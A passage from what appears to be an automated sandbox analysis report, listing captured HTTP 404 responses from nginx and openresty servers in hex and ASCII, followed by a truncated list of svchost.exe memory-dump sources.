20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:34 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:35 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:33:38 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openresty/1.21.4.3Date: Mon, 11 Nov 2024 17:33:39 GMTContent-Type: text/htmlContent-Length: 561Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 2f 31 2e 32 31 2e 34 2e 33 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>openresty/1.21.4.3</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:44 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:33:47 GMTContent-Type: text/htmlContent-Length: 138Connection: keep-aliveETag: "663ee226-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:35:02 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 11 Nov 2024 17:35:03 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:35:05 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 11 Nov 2024 17:35:05 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
    Source: svchost.exe, 00000002.00000003.1887211351.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1585352038.00000000008A9000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575012151.00000000008A5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1575011118.000000000602E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1975283760.000000000602A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1597491228.000000000B452000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1609566832.000000000B453000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1579902234.00000000008A6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1986153495.000000000602B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 